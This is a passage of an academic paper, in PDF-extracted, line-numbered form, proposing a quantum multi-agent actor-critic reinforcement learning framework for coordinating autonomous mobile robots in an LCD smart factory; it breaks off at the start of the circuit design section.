 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ 1
2
+ Quantum Multi-Agent Actor-Critic Neural
3
+ Networks for Internet-Connected Multi-Robot
4
+ Coordination in Smart Factory Management
5
+ Won Joon Yun, Graduate Student Member, IEEE, Jae Pyoung Kim, Soyi Jung, Member, IEEE,
6
+ Jae-Hyun Kim, Member, IEEE, and Joongheon Kim, Senior Member, IEEE
7
+ Abstract—As one of the latest fields of interest in both
8
+ academia and industry, quantum computing has garnered sig-
9
+ nificant attention. Among various topics in quantum computing,
10
+ variational quantum circuits (VQC) have been noticed for their
11
+ ability to carry out quantum deep reinforcement learning (QRL).
12
+ This paper verifies the potential of QRL, which will be further
13
+ realized by implementing quantum multi-agent reinforcement
14
+ learning (QMARL) from QRL, especially for Internet-connected
15
+ autonomous multi-robot control and coordination in smart fac-
16
+ tory applications. However, the extension is not straightforward
17
+ due to the non-stationarity of classical MARL. To cope with
18
+ this, the centralized training and decentralized execution (CTDE)
19
+ QMARL framework is proposed under the Internet connec-
20
+ tion. A smart factory environment with the Internet of Things
21
+ (IoT)-based multiple agents is used to show the efficacy of
22
+ the proposed algorithm. The simulation corroborates that the
23
+ proposed QMARL-based autonomous multi-robot control and
24
+ coordination performs better than the other frameworks.
25
+ Index Terms—Quantum deep learning, multi-agent reinforce-
26
+ ment learning, quantum computing, robot control, smart factory
27
+ I. INTRODUCTION
28
+ In various Industry 4.0 scenarios, automated and au-
29
+ tonomous management of smart factory systems are getting
30
+ a lot of attention nowadays [2]–[8]. For the automation of
31
+ factory management, the use of autonomous multiple mobile
32
+ robots is widely studied [9]–[11]. According to the Verizon
33
+ Report [12], Industry 4.0 is squarely underway in manufac-
34
+ turing. The global market is expected to reach $219.8 billion
35
+ by 2026, and autonomous mobile robots are becoming key
36
+ workhorses in this transformation. To realize the efficient and
37
+ effective autonomous multi-robot control and coordination,
38
+ multi-agent reinforcement learning (MARL)-based algorithms
39
+ are essentially required [13], [14].
40
+ Recently, revolutionary innovations have been made in dis-
41
+ tributed learning and MARL due to the remarkable evolution
42
+ in computing hardware and deep learning algorithms [14].
43
+ A preliminary version of this paper was presented at the IEEE Int’l Conf.
44
+ on Distributed Computing Systems (ICDCS), Bologna, Italy, July 2022 [1].
45
+ This research was funded by National Research Foundation of Korea
46
+ (2022R1A2C2004869, 2021R1A4A1030775). (Corresponding authors: Soyi
47
+ Jung, Jae-Hyun Kim, Joongheon Kim).
48
+ Won Joon Yun, Jae Pyoung Kim, and Joongheon Kim are with the School
49
+ of Electrical Engineering, Korea University, Seoul 02841, Republic of Korea
50
+ (e-mails: {ywjoon95,paulkim436,joongheon}@korea.ac.kr).
51
+ Soyi Jung and Jae-Hyun Kim are with the Department of Electrical and
52
+ Computer Engineering, Ajou University, Suwon 16499, Republic of Korea
53
+ (e-mails: {sjung,jkim}@ajou.ac.kr).
54
+ Moreover, the developments in quantum computing hardware
55
+ and algorithms placed further emphasis on this trend [15],
56
+ resulting in the incentivization of the research on quantum
57
+ machine learning. Nowadays, quantum machine learning is at
58
+ a newborn level compared to conventional machine learning.
59
+ For instance, in the classification task of quantum machine
60
+ learning, the performance of quantum machine learning is low
61
+ given the MNIST dataset at 32.5% of top-1 accuracy [16]
62
+ on quantum computers, and 74.2% [17] on ideal quantum
63
+ machines. However, the theoretically discovered advantages
64
+ (i.e., quantum supremacy) are being experimentally proven
65
+ recently [18]–[20]. The potential of quantum algorithms is
66
+ evident from their ability to downsize the model parameters
67
+ while maintaining accuracy by exploiting quantum entangle-
68
+ ments [21]. In addition, the empirical result of [22] shows that
69
+ quantum machine learning outperforms the empirical result of
70
+ classical machine learning. An outstanding example of this is
71
+ the variational quantum circuit (VQC) architecture, also known
72
+ as a quantum neural network (QNN) [23], [24]. QNN is a
73
+ quantum circuit that reproduces the function of a classical
74
+ deep neural network. By combining the QNN and classical
75
+ deep learning models, hybrid quantum-classical models are
76
+ built, which allow QRL to be carried out. Compared to RL,
77
+ QRL uses lesser model parameters but significantly reduces
78
+ the training and inference time [25], [26] while consuming
79
+ lesser computing resources as well [27]. Thus, it is clear
80
+ that quantum machine learning using quantum computing will
81
+ become a big trend in the near future. This paper aims to
82
+ combine VQC with the classical MARL to extend QRL to
83
+ quantum MARL (QMARL).
84
+ The agents in the MARL environment interact with each
85
+ other by either cooperating or competing. This interaction is
86
+ realized based on Internet-of-Things (IoT)-based connectivity
87
+ technologies. These interactions result in a non-stationary
88
+ reward for each agent, which hinders the convergence of
89
+ MARL training. The centralized training and decentralized
90
+ execution (CTDE) method is used [28] to deal with the non-
91
+ stationarity of the MARL model. In this scenario, the reward
92
+ is distributed to all agents concurrently by concatenating
93
+ their state-actions pairs. A na¨ıve implementation of a VQC
94
+ version of CTDE is possible, as shown in [1]. However, such
95
+ implementation causes the qubits to increase with the number
96
+ of agents because when QRL is carried out via VQC, the state-
97
+ action pairs are represented by qubits. Consequently, quantum
98
+ errors will also increase with the qubits [29], significantly
99
+ arXiv:2301.04012v1 [quant-ph] 4 Jan 2023
100
+
101
+ 2
102
+ affecting the MARL convergence and scalability. Furthermore,
103
+ quantum error correction is not yet viable in the current noisy
104
+ intermediate-scale quantum (NISQ) era.
105
+ This paper intends to improve on various pre-existing
106
+ methods of implementing VQCs, agent policies, and state
107
+ encoding [25], [30], [31]. Three significant differences exist
108
+ for our proposed VQC compared to previous works, which are
109
+ parameter sharing, non-random VQC design, and 2-variables
110
+ dense encodings. Firstly, parameter sharing refers to sharing
111
+ model parameter values between agents. All the agents in
112
+ previous works had individual, distinct policies meaning more
113
+ agents required more policies, resulting in excess computing
114
+ power consumption in the process of formulating them. In
115
+ this improved model, there will only be one policy that will
116
+ be shared among the agents, increasing computing power
117
+ efficiency. The second improvement is the non-random VQC
118
+ design. The VQCs used in previous works are composed of
119
+ randomly selected quantum gates. Although the performance
120
+ is remarkable, it cannot be easily reproduced because of its
121
+ randomness. The same model might not show the same per-
122
+ formance in another iteration because of the random quantum
123
+ gates. However, this is improved in this paper by designing a
124
+ fixed model and removing the random nature of the previous
125
+ VQC. This ensures the reproducibility and stability of the
126
+ model. Finally, the proposed model in this paper utilizes the
127
+ 2-variables dense encoding method instead of the 4-variables
128
+ dense encoding method. The original encoding method is ca-
129
+ pable of reducing the dimensions of given data. Although this
130
+ may be good for the NISQ-era quantum circuits, it inevitably
131
+ causes a loss of information. The proposed 2-variables dense
132
+ encoding method does not reduce data dimensions, but it is still
133
+ compatible with NISQ-era quantum circuits. Thus, information
134
+ loss is prevented, which will improve the performance of this
135
+ model.
136
+ Contributions. The major contributions of this research are
137
+ summarized as follows.
138
+ • This paper first provides a quantum-based MARL solu-
139
+ tion for autonomous multi-robot control and coordination
140
+ in smart factory applications.
141
+ • An improved and novel CTDE QMARL framework
142
+ which utilizes parameter sharing on policy, VQC design,
143
+ and 2-variables dense encodings is additionally proposed.
144
+ • Lastly, via extensive experiments, the proposed QMARL
145
+ framework is proven to be superior to the classical
146
+ MARL model by carrying out simulations in smart fac-
147
+ tory scenarios. The results show that the proposed model
148
+ produces higher performance than the others.
149
+ Organization. The rest of this paper is organized as follows.
150
+ The preliminaries of this paper are described in Sec. II. Our
151
+ considering autonomous mobile robots coordination for smart
152
+ manufacturing is described in Sec. III. Sec. IV introduces our
153
+ proposed algorithm; and the numerical results and demonstra-
154
+ tion of the proposed algorithm are shown in Sec. V. Sec. VI
155
+ concludes this paper and presents future work. Note that the
156
+ notations in this paper are listed in Table I. Most equations
157
+ and notations used here are based on the Dirac notations used
158
+ in [32].
159
+ TABLE I: List of notations
160
+ Scenario Notations
161
+ N
162
+ The number of AMR agents
163
+ M
164
+ The number of sites/warehouses
165
+ T
166
+ An episode length
167
+ on
168
+ The observation of n-th AMR agent
169
+ an
170
+ The action of n-th AMR agent
171
+ a
172
+ The actions set of AMR agents, i.e., a = {an}N
173
+ n=1.
174
+ s
175
+ The ground truth state
176
+ qc
177
+ m,t
178
+ The load status of m-th warehouse at time t
179
+ qe
180
+ n,t
181
+ The load status of n-th AMR agent at time t
182
+ qe
183
+ max
184
+ A load capacity of warehouse
185
+ qe
186
+ max
187
+ A load capacity of AMR agent
188
+ Quantum Computing Notations
189
+ |ψ⟩
190
+ Entangled quantum state
191
+ ⟨O⟩
192
+ Observable
193
+ Γ
194
+ Pauli-Γ gate, e.g., Γ ∈ {X, Y, Z}
195
+
196
+ Rotating Γ gate, e.g., Γ ∈ {X, Y, Z}
197
+ (·)†
198
+ Complex conjugate operator
199
+ M
200
+ Measurement operator
201
+ II. PRELIMINARIES OF QUANTUM COMPUTING
202
+ Single Qubit Quantum State. QC utilizes a qubit as the
203
+ basic unit of computation. The qubit represents a quantum
204
+ superposition state between two basis states, denoted as |0⟩
205
+ and |1⟩. There are two ways to describe a qubit state,
206
+ |ψ⟩ = α|0⟩ + β|1⟩,
207
+ (1)
208
+ where ∥α∥2
209
+ 2 + ∥β∥2
210
+ 2 = 1, as well as,
211
+ |ψ⟩ = cos
212
+ �δ
213
+ 2
214
+
215
+ |0⟩ + eiϕ sin
216
+ �δ
217
+ 2
218
+ ���
219
+ |1⟩,
220
+ (2)
221
+ where δ ∈ [−π, π] and ϕ ∈ [−π, π]. The former is based on
222
+ a normalized 2D complex vector, while the latter is based on
223
+ polar coordinates (δ, ϕ) from a geometric viewpoint. The qubit
224
+ state is mapped into the surface of a 3D unit sphere (Bloch
225
+ sphere). In addition, a quantum gate is a unitary operator
226
+ transforming a qubit state into another qubit state, which is
227
+ represented as a 2×2 matrix with complex entries. The single-
228
+ qubit Pauli gates X, Y , and Z are defined as follows,
229
+ X =
230
+ �0
231
+ 1
232
+ 1
233
+ 0
234
+
235
+ ,
236
+ Y =
237
+ �0
238
+ −i
239
+ i
240
+ 0
241
+
242
+ ,
243
+ Z =
244
+ �1
245
+ 0
246
+ 0
247
+ −1
248
+
249
+ .
250
+ (3)
251
+ There are additional quantum gates that are frequently used,
252
+ i.e., Rx, Ry, and Rz. These are rotation operator gates rotate a
253
+ single qubit by δ around their corresponding axes in the Bloch
254
+ sphere and the single qubit operation can be expressed as the
255
+ following equations,
256
+ RX(δ) = e−i δ
257
+ 2 X,
258
+ RY (δ) = e−i δ
259
+ 2 Y ,
260
+ RZ(δ) = e−i δ
261
+ 2 Z,
262
+ (4)
263
+ where rotation angles are denoted as δ ∈ R[0, 2π]. These basic
264
+ Pauil and rotation gates are unitary matrices, U †U = I, where
265
+ I denotes an identity matrix.
266
+
267
+ 3
268
+ Multi-Qubit Quantum State. Multi-qubit system enables
269
+ super-fast quantum computing due to quantum superposition.
270
+ The well-known quantum algorithms (e.g., Shor algorithm
271
+ [33] and Grover search [34]) are based on the multi-qubit
272
+ system. The quantum state with q qubits is denoted as |ψ⟩ =
273
+ |ψ1⟩ ⊗ |ψ2⟩ ⊗ · · · ⊗ |ψq⟩ = �2q−1
274
+ n=0 αn|n⟩, where ⊗, αn and
275
+ |n⟩ stand for superposition operator (i.e., tensor-product), and
276
+ n-th probability amplitude and n-th basis of q-qubits quantum
277
+ state, respectively. Note that the sum of squared magnitude of
278
+ probability amplitude equals 1, i.e., �2q−1
279
+ n=0 |αn|2 = 1 [32]. To
280
+ realize quantum superposition, there are quantum gates that
281
+ operate on multiple qubits, called controlled rotation gates.
282
+ They act on a qubit according to the signal of several con-
283
+ trol qubits, which generates quantum entanglement between
284
+ those qubits. Among them, the Controlled-X (or CNOT) gate
285
+ CX =
286
+ �I
287
+ 0
288
+ 0
289
+ X
290
+
291
+ is one of the widely used control gates.
292
+ These multi-qubit gates allow quantum algorithms to work
293
+ with their features on VQC, which will eventually be utilized
294
+ for QMARL.
295
+ III. AUTONOMOUS MOBILE ROBOTS COORDINATION FOR
296
+ SMART MANUFACTURING
297
+ A. Design of an Autonomous Mobile Robot System
298
+ An automated guided vehicle (AGV) is a portable robot that
299
+ travels along lines or wires marked on the floor or navigates
300
+ using radio waves, vision cameras, magnets, or lasers. AGVs
301
+ are widely used in industrial applications to transport heavy
302
+ materials around large industrial facilities such as factories and
303
+ warehouses. Therefore, it is obvious that AGVs are essential
304
+ to smart factory management. The autonomous mobile robot
305
+ (AMR) differs from AGV because it has various sensors
306
+ that enable autonomous location identification and search by
307
+ detecting surrounding static and dynamic objects. Their paths
308
+ are generated based on static and dynamic obstacles in real
309
+ time so that AMR can travel freely without a predefined path.
310
+ While the system is more flexible, real-time path generation
311
+ poses additional challenges that fleet management systems
312
+ (FMSs) must deal with such as, performing activities, e.g.,
313
+ shipping transport orders, routing vehicles, and scheduling
314
+ task execution. Note that AMRs are tightly combined, which
315
+ leads to high computational complexity. For example, the
316
+ performance of AMRs suffer when considering all possible
317
+ AMR paths, even though the numbers of AMRs and transfer
318
+ orders are relatively small. As a result, centralized AMR
319
+ fleet management and order execution optimization are often
320
+ not performed in real time. Therefore, the use of MARL
321
+ algorithms is widely considered and studied [35]. For further
322
+ performance improvement, QMARL can be additionally uti-
323
+ lized, as we discuss in this paper.
324
+ B. Automated LCD Smart Factory with Multiple AMRs
325
+ Thanks to the properties of QC, QC has shown that QC
326
+ could save many orders of magnitude in energy consumption
327
+ compared to classical supercomputers [36]. Regarding QRL,
328
+ recent studies show quantum supremacy [22]. In this paper,
329
+ we consider a liquid crystal display (LCD) smart factory
330
+ system which utilizes DC-based AMRs. As shown in Fig. 1,
331
+ the color thin-film transistor (TFT) LCD panel consists of
332
+ two glass substrates; a TFT array substrate and a color filter
333
+ substrate. TFT LCD panels are fabricated by a combination
334
+ of five processes; TFT array filter process, color filter process,
335
+ repair process, cell fabrication process, and module assembly
336
+ process. The first two processes (i.e., TFT array filter and color
337
+ filter processes) are carried out at Site A, the two substrates
338
+ are carried by AMR and the rest of the process is carried
339
+ out at Site B. Each AMR has a role in the transition from
340
+ providing services to flexible areas that require decisions to
341
+ be made based on dividing the service area into several zones.
342
+ In the process of manufacturing TFT LCDs, various defective
343
+ LCDs can occur which should not be used. Therefore, to
344
+ prevent the usage of such defective LCDs, the AMRs must
345
+ identify the defective products and request a quality verifi-
346
+ cation of the LCD. Techniques of detecting defects among
347
+ LCDs have already been developed and implemented in smart
348
+ factories [37]–[39]. By using the precision parameter proposed
349
+ by the works above, the AMRs will recognize defective LCDs
350
+ and unload them in another collection point dedicated for
351
+ defects.
352
+ In this paper, we assume that all AMRs have the optimal
353
+ trajectory planners and charging schedulers such as [40], [41].
354
+ Thus, our proposed QMARL model must plot the trajectory of
355
+ each AMR such that the defective LCDs are separated while
356
+ the normal products are properly unloaded. For communica-
357
+ tion, the QDL server is wire-linked to every site, and each
358
+ site is wirelessly connected with AMRs. Since the packet size
359
+ is small, and the transmit power is sufficient in LCD smart
360
+ factory, we assume that the packet loss is negligible. The
361
+ QDL server receives observation from AMRs, reconfigures
362
+ the state, and finally transmits action decisions to AMRs. For
363
+ flexible manufacturing, AMRs should be properly planned to
364
+ load goods, unload goods, and control the quality of LCD.
365
+ Moreover, the decision-making process of scheduling and
366
+ dispatching these resources is essential for optimal utilization
367
+ and high AMR productivity performance.
368
+ Problem Definition and Formulation. In this situation, a
369
+ quantum deep learning (QDL) server supports the decision-
370
+ making process for efficiently scheduling material handling
371
+ systems, under the fundamental concept of the CTDE-based
372
+ QMARL framework. Specifically, the QDL server makes dis-
373
+ tributed and sequential decisions for each AMR to determine
374
+ their goods (i.e., the number of goods to carry in each AMR
375
+ and requesting quality control) for eliminating the overflow
376
+ and underflow of delivering goods in each AMR.
377
+ IV. QUANTUM MULTI-AGENT ACTOR-CRITIC NETWORK
378
+ FOR AUTONOMOUS MULTI-ROBOT COORDINATION
379
+ A. Fundamental MDP Formulation
380
+ Our considering autonomous multi-robot coordination in
381
+ a smart factory environment consists of M sites and N
382
+ AMR agents. The smart factory environment is mathematically
383
+ modeled with POMDP (referred to as Sec. II). Hereafter, we
384
+ explain the description based on m-th site, n-th agent, and
385
+ time step t.
386
+
387
+ 4
388
+ Manufacturing
389
+ Process
390
+ Problem
391
+ Statement
392
+ Site A
393
+ AMR
394
+ Warehouse
395
+ Site B
396
+ Warehouse
397
+ Liquid Crystal Display (LCD) Smart Factory
398
+ QDL Server
399
+ QDL Server B
400
+ 𝑠!
401
+ 𝑜!
402
+ "
403
+ 𝑜!
404
+ #
405
+ 𝑟!
406
+ 𝑎!
407
+ "
408
+ 𝑎!#
409
+ 𝑠!$"
410
+ 𝑁
411
+ decentralized
412
+ agents
413
+ Observation
414
+ Action
415
+ Current
416
+ state
417
+ Next
418
+ state
419
+ Reward
420
+ TFT Filter
421
+ Color Filter
422
+ Mura
423
+ Abnormal patterns
424
+ Repair
425
+ LCD cell
426
+ Module
427
+ Processing time
428
+ Cleaning time
429
+ Repair
430
+ Problem-solving: Joint optimization
431
+ Problem-modeling: POMDP
432
+ Critic
433
+ Network
434
+ Actor
435
+ Networks
436
+ Fig. 1: System model: Liquid crystal display panel manufacturing using quantum multi-agent reinforcement learning
437
+ 1) Load Dynamics: Each site has a warehouse where the
438
+ load capability is cW
439
+ max. In addition, the load capacities of
440
+ AMR agents is under the maximum capacities cA
441
+ max. AMR
442
+ agents receive goods (e.g., LCD panels or TFTs) from other
443
+ AMRs. In this paper, we denote the load weights bA,n
444
+ t
445
+ .
446
+ The load weights follow the uniform distribution ∀bA,n
447
+ t
448
+
449
+ U(0, wload · bmax). The warehouse and AMR agents have
450
+ loading status cW,m
451
+ t
452
+ and cA,n
453
+ t
454
+ that are temporally loaded
455
+ goods. All AMR agents carry their goods to warehouses. The
456
+ dynamics are as follows,
457
+ cξ,n
458
+ t+1 = clip(cξ,n
459
+ t
460
+ − aξ,n
461
+ t
462
+ + bξ,n
463
+ t
464
+ , 0, cξ
465
+ max),
466
+ (5)
467
+ where ξ ∈ {W, A} identifies the warehouse and an AMR
468
+ agent. The terms aξ,k
469
+ t
470
+ and bξ,n
471
+ t
472
+ imply the total delivered goods
473
+ weights and the received goods weights of m-th warehouse or
474
+ n-th AMR agent, respectively. Note that aA,n
475
+ t
476
+ is n-th AMR
477
+ agent’s action. In addition, a clipping function is defined as
478
+ clip(x, xmin, xmax) ≜ min(xmax, max(x, xmin)).
479
+ 2) Quality Control: We assume that the loads have been
480
+ classified by the previous defect detection process. In the
481
+ defect detection process, four types are given to the loads
482
+ (i.e., true positives, false positives, false negatives, and true
483
+ negatives), which make the statistics (i.e., precision, recall, and
484
+ F-score). This paper considers the load status as the quality
485
+ statistics (e.g., precision). Among them, quality statistics are
486
+ given to AMR agents. The AMR agents can make action
487
+ decisions for re-requesting quality control of the load. If the
488
+ loads are requested for quality control, the loads undergo qual-
489
+ ity verification by quality engineers. We assume that quality
490
+ engineers can detect all defects on load perfectly. However, the
491
+ quality re-assurance process via quality engineers additionally
492
+ requires τqual time delay.
493
+ 3) Utility Design: We design the utility for quality, time
494
+ delay, and load balancing. First of all, AMR agents receive the
495
+ goods with the type of true positives (TP) and false positives
496
+ (FP). The metric, i.e., precision, can represent the ratio of
497
+ positive predictive value, which is written as follows:
498
+ uq,n
499
+ t
500
+ =
501
+ TPn
502
+ t
503
+ TPn
504
+ t + FPn
505
+ t
506
+ ,
507
+ (6)
508
+ where TPn
509
+ t
510
+ =
511
+
512
+ load∈ln
513
+ t 1(load
514
+ =
515
+ TP) and FPn
516
+ t
517
+ =
518
+
519
+ load∈ln
520
+ t 1(load = FP) stand for the true positives and false
521
+ positives of n-th AMR, respectively. Note that ln
522
+ t denotes the
523
+ whole load defect status of n-th AMR. Regarding the delay,
524
+ we measure the processing time. Thus, the delay utility of n-th
525
+ AMR agent is written as follows:
526
+ ud,n
527
+ t
528
+ = −
529
+
530
+ 1 + τqual · qn
531
+ t
532
+
533
+ ,
534
+ (7)
535
+ where qn
536
+ t
537
+ denotes the quality control action. If qn
538
+ t
539
+ = 1,
540
+ the loads are conveyed to quality engineers; otherwise, the
541
+ loads are conveyed to other-site. Finally, load balancing is to
542
+ minimize the total amount of overflowed load and the event
543
+ where the load is empty. Thus, the utility for load balancing
544
+ is written as follows:
545
+ ub,n
546
+ t
547
+ = 1(cA,n
548
+ t+1=0) · ˜cA,n
549
+ t
550
+ + 1(cA,n
551
+ t+1=cA
552
+ max) · ˆcW,n
553
+ t
554
+ (8)
555
+ uW,m
556
+ t
557
+ = 1(cW,m
558
+ t+1 =0) · ˜cW,m
559
+ t
560
+ + 1(cW,m
561
+ t+1 =cW
562
+ max) · ˆcW,m
563
+ t
564
+ (9)
565
+ where ˜cW,m
566
+ t
567
+ = |cW,n
568
+ t
569
+ −aW,n
570
+ t
571
+ +bW,n
572
+ t
573
+ | and ˆcW,n
574
+ t
575
+ = |cmax−˜cW,n
576
+ t
577
+ |.
578
+ Note that r(st, at) ∈ [−∞, 0] (negative) because this paper
579
+ considers the occurrence of abnormal loading status (e.g., load
580
+ overflow or underflow) as a negative utility. The objective is
581
+ to maximize the total precision and minimize the total delay
582
+ and overflowed or underflowed event.
583
+ B. POMDP Setup
584
+ This
585
+ subsection
586
+ introduces
587
+ the
588
+ formal
589
+ definition
590
+ of
591
+ POMDP, i.e., a stochastic decision-making model under un-
592
+
593
+ blobmura
594
+ blackspot
595
+ white spot
596
+ Around gap mura
597
+ linemuraa
598
+ (b)5
599
+ certainty among agents [42]; and our proposed QMARL
600
+ is mathematically modeled with this fundamental concept
601
+ of POMDP. Note that POMDP is defined as a tuple
602
+ ⟨N, S, A, P, r, Z, O, ρ, γ, T⟩. The sets of states and obser-
603
+ vations are represented as S and Z, respectively. N
604
+ :=
605
+ {1, · · · , N} and s ∈ S denote the set of N agents and the
606
+ current state of the environment, respectively. The initial state
607
+ s0 ∼ ρ follows the distribution ρ. The action of n-th agent
608
+ an ∈ A is discrete or continuous actions, and the joint action
609
+ is denoted as a := {an}N
610
+ n=1. The transition is determined
611
+ with probability function P(s′|s, a) : S × A × S → S,
612
+ where s′ denotes the next state. The shared reward rt =
613
+ r(st, at) : S × A → R is given to whole agents. In Dec-
614
+ POMDP, the true state s is not directly given to agents. Each
615
+ agent n ∈ N has observation zn ∈ Z from observation
616
+ function O(s, a) : S × A → Z. We consider that all
617
+ agents have parameter-shared policy denoted as πθ. Thus, the
618
+ policy πθ takes the n-th agent’s observation zn
619
+ t
620
+ ∈ Z and
621
+ decides n-th agent’s action as πθ(a|zn) : Z × A → [0, 1].
622
+ The objective of POMDP is to obtain the optimal policy
623
+ π∗
624
+ θ = arg maxπθ Ea∼πθ[�T
625
+ t=1 γt−1 · rt], where γ ∈ R[0, 1]
626
+ and T denote the discount factor and finite time, respectively.
627
+ Based on this definition, we design the POMDP as follows:
628
+ 1) Observation:
629
+ Each AMR agent partially obtains its
630
+ observation. Because the parameter shared policy πθ is used,
631
+ the observation contains the binary indicator vector n2. In
632
+ addition, n-th AMR agent makes its action decision with
633
+ its loading status cA,n
634
+ t
635
+ , and the current loading status of
636
+ warehouse {cW,m
637
+ t
638
+ }M
639
+ m=1. In summary, n-th agent’s observation
640
+ is defined as zn
641
+ t ≜ {n2, cA,n
642
+ t
643
+ } ∪ {cW,m
644
+ t
645
+ }M
646
+ m=1.
647
+ 2) State: A state information variable containing informa-
648
+ tion about all AMR agents’ and warehouse’s loading sta-
649
+ tus is designed. The state variable at time t is as st =
650
+ {cA,n
651
+ t
652
+ , ud,n
653
+ t
654
+ }N
655
+ n=1∪{cW,m
656
+ t
657
+ }M
658
+ m=1. Note that the state information
659
+ is utilized as the input of the quantum critic network.
660
+ 3) Action: It is considered that AMR agents can choose
661
+ which warehouse to convey goods, where the destination
662
+ space is defined as I ≜ {1, · · · , M}. In addition, AMR
663
+ agents can determine conveying quantity to the warehouse.
664
+ The conveying quantity and the quality control space is defined
665
+ as P ≜ {pmin, · · · , pmax} and Q ≜ {0, 1}, respectively.
666
+ Finally, n-th AMR agent’s action and its action space are
667
+ defined as an
668
+ t := (in
669
+ t , pn
670
+ t , qn
671
+ t ) ∈ A ≡ I × P × Q.
672
+ 4) Reward: The objective of POMDP is to minimize the
673
+ total amount of overflowed load and the event where the load
674
+ is empty. Thus, the reward r(st, at) is defined as follows,
675
+ r(st, at) =
676
+ N
677
+
678
+ n=1
679
+ (uq,t
680
+ t
681
+ +wd ·ud,n
682
+ t
683
+ +wb ·ub,n
684
+ t
685
+ )+wW ·
686
+ M
687
+
688
+ m=1
689
+ uW,m
690
+ t
691
+ ,
692
+ (10)
693
+ where wd, wb, and wW stand for reward coefficients for
694
+ time delay, and load-balancing of AMR agents and sites,
695
+ respectively.
696
+ C. Quantum Multi-Agent Actor-Critic Network Design
697
+ 1) State Encoding Circuit: The state encoding circuit is
698
